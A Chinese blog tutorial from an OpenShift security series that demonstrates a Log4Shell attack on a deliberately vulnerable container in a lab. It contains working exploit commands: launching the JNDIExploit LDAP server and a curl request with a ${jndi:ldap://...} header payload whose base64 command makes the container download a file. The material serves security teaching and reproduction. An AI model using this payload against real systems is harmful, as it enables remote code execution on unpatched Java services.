OpenShift Security (13) - 利用Log4j漏洞攻击容器(附视频)

已于 2023-01-10 19:31:27 修改
阅读量1.9k 收藏
点赞数
分类专栏: OpenShift 4 DevOps 安全 文章标签: 安全 容器 log4j
于 2021-12-24 22:51:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43902588/article/details/122137060
版权
OpenShift 4 同时被 3 个专栏收录
271 篇文章 77 订阅
订阅专栏
DevOps
89 篇文章 3 订阅
订阅专栏
安全
76 篇文章 6 订阅
订阅专栏

OpenShift 4.x HOL教程汇总

文章目录

漏洞攻击过程

利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j。2)带有“JNDI 注入”的运行环境。

以下在 2 个节点上进行验证:

  1. 在 172.17.0.30 上执行以下命令,运行带有 “JNDI 注入” 的环境。
$ curl -OL https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip
$ unzip JNDIExploit.zip
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.30 -p 8888
  1. 在 172.17.0.29 上执行命令。先启动受到 Log4j 漏洞影响的容器,并确认“/tmp”目录下的文件。然后将入驻命令进行 base64 编码,再利用 JNDI 服务注入命令并执行。最后可以确认,受到Log4j漏洞影响的容器内部中已经有被下载的测试文件。
$ docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
$ docker exec vulnerable-app ls -al /tmp
total 35100
drwxrwxrwt    1 root     root          4096 Dec 24 14:28 .
drwxr-xr-x    1 root     root          4096 Dec 24 14:24 ..
drwxr-xr-x    2 root     root          4096 Dec 24 14:24 hsperfdata_root
drwx------    2 root     root          4096 Dec 24 14:24 tomcat-docbase.8080.1524040148610409673
drwx------    3 root     root          4096 Dec 24 14:24 tomcat.8080.4589198206320996711
$ echo 'wget https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip -P /tmp' | base64
$ curl 172.17.0.29:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.30:1389/Basic/Command/Base64/d2dldCBodHRwczovL2dpdGh1Yi5jb20vZ2l0ZXJsaXp6aS9KTkRJRXhwbG9pdC9yZWxlYXNlcy9kb3d$ ubG9hZC92MS4yL0pORElFeHBsb2l0LnppcCAtUCAvdG1wCg==}'
$ docker exec vulnerable-app ls -al /tmp
total 35100
drwxrwxrwt    1 root     root          4096 Dec 24 14:28 .
drwxr-xr-x    1 root     root          4096 Dec 24 14:24 ..
-rw-r--r--    1 root     root      35919493 Dec 24 14:28 JNDIExploit.zip
drwxr-xr-x    2 root     root          4096 Dec 24 14:24 hsperfdata_root
drwx------    2 root     root          4096 Dec 24 14:24 tomcat-docbase.8080.1524040148610409673
drwx------    3 root     root          4096 Dec 24 14:24 tomcat.8080.4589198206320996711

演示视频

视频

dawnsky.liu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2241
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4jlog for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
最新发布
m0_74196038的博客
03-19 873
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
Log4j史诗级漏洞,从原理到实战,只用3个实例讲明白
程序新视界
12-13 1万+
背景 最近互联网技术圈最火的一件事莫过于Log4j2的漏洞了。同时也涌现出了各类分析文章,关于漏洞的版本、漏洞的原因、漏洞的修复、程序员因此加班等等。 经常看我文章的朋友都知道,面对这样热门有意思的技术点,怎能错过深入分析一波呢?大概你也已经听说了,造成漏洞的”罪魁祸首“是JNDI,今天我们就聊它。 JNDI,好熟悉,但……熟悉的陌生人?JNDI到底是个什么鬼?好吧,如果你已经有一两年的编程经验,但还不了解JNDI,甚至没听说过。那么,要么赶紧换工作,要么赶紧读读这篇文章。 JNDI是个什么鬼? 说起JND
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7477
log4j漏洞原理和靶场复现
openshift-container-platform:Azure上的OpenShift容器平台
04-30
OpenShift容器平台3部署模板 注意:回购的结构 Master分支已更新,以部署版本3.11 已完成重大更新-部署前请先阅读 master分支包含OpenShift Container Platform 3的最新版本,当前版本为3.11。 我们将仅维护OCP当前...
openshift-java-client, OpenShift REST API的Java客户端.zip
09-18
openshift-java-client, OpenShift REST API的Java客户端 OpenShift客户端 OpenShift REST API的Java客户端。 它几乎提供了 rhc-* 命令行 工具( 。创建/重命名域,创建/销毁应用程序,列出应用程序,列出可用墨盒,...
openshift-ansible-kvm:UPI在KVM上安装OpenShift 4的Ansible剧本
05-03
openshift-ansible-kvm 该存储库包含Ansible剧本,用于在KVM上进行OpenShift 4的UPI安装。 它同时支持和部署。 注意:此配置用于一次性测试,不支持生产使用。要求工作站(或称其为基础节点,控制节点...),运行...
openshift-restclient-python:适用于OpenShift API的Python客户端
05-01
目录删除修补代替手表社区,支持,讨论行为守则 安装来自来源: git clone https://github.com/openshift/openshift-restclient-python.gitcd openshift-restclient-pythonpython setup.py install直接从PyPi : pip...
openshift-auto-upi:OpenShift自动化的用户提供的基础结构
02-01
openshift-auto-upi:OpenShift自动化的用户提供的基础结构
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
漏洞复现】Apache Log4j 漏洞利用分析
网络安全知识分享
12-31 7401
❝ Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了,复现漏洞来学习一下,希望可以帮助到大家 ❞ 0x01影响范围 引用了版本处于2.x < 2.15.0-rc2的 Apache log4j-core的应用项目或组件 0x02复现环境 log4j-core 2.14.1 marshalsec JDK-1.8.0_221 0x03 漏洞分析 测试代码如下: #log4j,java impo
Log4j远程代码执行漏洞
派大星的博客
09-21 2516
Log4j远程执行漏洞原理分析
【Docker】Docker容器数据卷
kuangd_1992的博客
04-08 467
卷是目录和文件,存在于一个或多个容器中,由docker挂载到容器,但不属于联合文件系统,因此能够绕过UnionFS提供一些用于持续存储或共享数据的特性。——将docker容器内的数据保存进宿主机的磁盘中。卷的设计目的:数据持久化,独立于容器的生命周期,因此docker不会在容器删除时删除其挂载的数据卷。
log4j漏洞详解
weixin_61638307的博客
03-21 3714
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
攻击和审计Docker容器04
蚁景网安学院
12-23 352
一、安全加固之Linux安全模型1、LSMLSM 是Linux内核的一个轻量级通用访问控制框架。用户可以根据其需求选择适合的安全模块加载到Linux内核中,从而大大提高了Linux安全访...
容器环境红队手法总结
Docker的专栏
11-12 422
引言随着云原生的火热,容器容器编排平台的安全也受到了行业关注,Gartner在近期发布的《Kubernetes安全防护指导框架》中给出Kubernetes安全的8个攻击面,总结如下:镜像...
openshift internal-registry 切换 sc
05-25
oc get cm image-registry-config -n openshift-image-registry -ojsonpath='{.data.storage}' ``` 2. 在输出中找到当前使用的 StorageClass 的名称,例如 `default`. 3. 创建一个新的 StorageClass,例如 `new-sc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值